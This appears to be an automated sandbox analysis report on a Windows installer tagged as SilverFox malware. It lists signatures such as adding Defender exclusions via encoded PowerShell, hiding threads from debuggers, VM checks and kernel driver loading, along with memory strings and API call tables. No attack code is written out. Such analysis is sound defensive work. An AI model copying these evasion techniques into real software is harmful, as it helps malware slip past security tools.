Windows Analysis Report
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe

Overview

General Information

Sample name: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
renamed because original name is a hash value
Original sample name: _1.0.4.exe
Analysis ID: 1579419
MD5: 44728e21199d2b04a4b25798625ac86e
SHA1: 382e29a97bb8a34a3164f7464692f16e3526bb1c
SHA256: 4cd9b5ec751ac76c5e71d500cd4592dbd4fc7ce4e88ea0187fbc04e66f976cc5
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: Submited Sample Integrated Neural Analysis Model: Matched 86.6% probability
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1801210662.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1800990919.0000000003840000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA598B0 FindFirstFileA,FindClose, 6_2_6CA598B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00386868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00386868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00387496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00387496
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: http://www.metalinker.org/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: https://aria2.github.io/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: https://aria2.github.io/Usage:
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr String found in binary or memory: https://www.innosetup.com/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: 01 00 00 00

System Summary

Source: update.vac.1.dr Static PE information: section name: .j)q
Source: update.vac.6.dr Static PE information: section name: .j)q
Source: updat4.vac.6.dr Static PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA63F30 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle, 6_2_6CA63F30
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E3886
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E3C62
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E3D18
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E3D62
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E39CF
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E3A6A
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA64B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, 6_2_6CA64B80
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E1950: CreateFileA,DeviceIoControl,CloseHandle, 6_2_6C8E1950
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor, 6_2_6C8E4754
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E4754 6_2_6C8E4754
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA65863 6_2_6CA65863
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA60900 6_2_6CA60900
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CAC4CE0 6_2_6CAC4CE0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB11D50 6_2_6CB11D50
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA96EA1 6_2_6CA96EA1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB17E80 6_2_6CB17E80
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CAB0EC9 6_2_6CAB0EC9
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB0C810 6_2_6CB0C810
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB179F0 6_2_6CB179F0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB28930 6_2_6CB28930
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA96972 6_2_6CA96972
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB0FAA0 6_2_6CB0FAA0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB22AA0 6_2_6CB22AA0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB0BAD0 6_2_6CB0BAD0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB0DA50 6_2_6CB0DA50
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA9EBCA 6_2_6CA9EBCA
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CAAEB66 6_2_6CAAEB66
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CAB340A 6_2_6CAB340A
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB10580 6_2_6CB10580
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB1D5C0 6_2_6CB1D5C0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB176E0 6_2_6CB176E0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA9A7CF 6_2_6CA9A7CF
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB37700 6_2_6CB37700
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB0E020 6_2_6CB0E020
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB21750 6_2_6CB21750
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003C81EC 10_2_003C81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0039E00A 10_2_0039E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00400000 10_2_00400000
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004081C0 10_2_004081C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00418240 10_2_00418240
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004022E0 10_2_004022E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00422300 10_2_00422300
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041C3C0 10_2_0041C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004104C8 10_2_004104C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003EE49F 10_2_003EE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004025F0 10_2_004025F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003F8650 10_2_003F8650
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FA6A0 10_2_003FA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003F66D0 10_2_003F66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FC950 10_2_003FC950
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003D0943 10_2_003D0943
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041E990 10_2_0041E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00402A80 10_2_00402A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003DAB11 10_2_003DAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003F8C20 10_2_003F8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00406CE0 10_2_00406CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00410E00 10_2_00410E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00414EA0 10_2_00414EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003E10AC 10_2_003E10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0040D089 10_2_0040D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003EB121 10_2_003EB121
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00411120 10_2_00411120
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004191C0 10_2_004191C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FB180 10_2_003FB180
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00405180 10_2_00405180
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FD1D0 10_2_003FD1D0
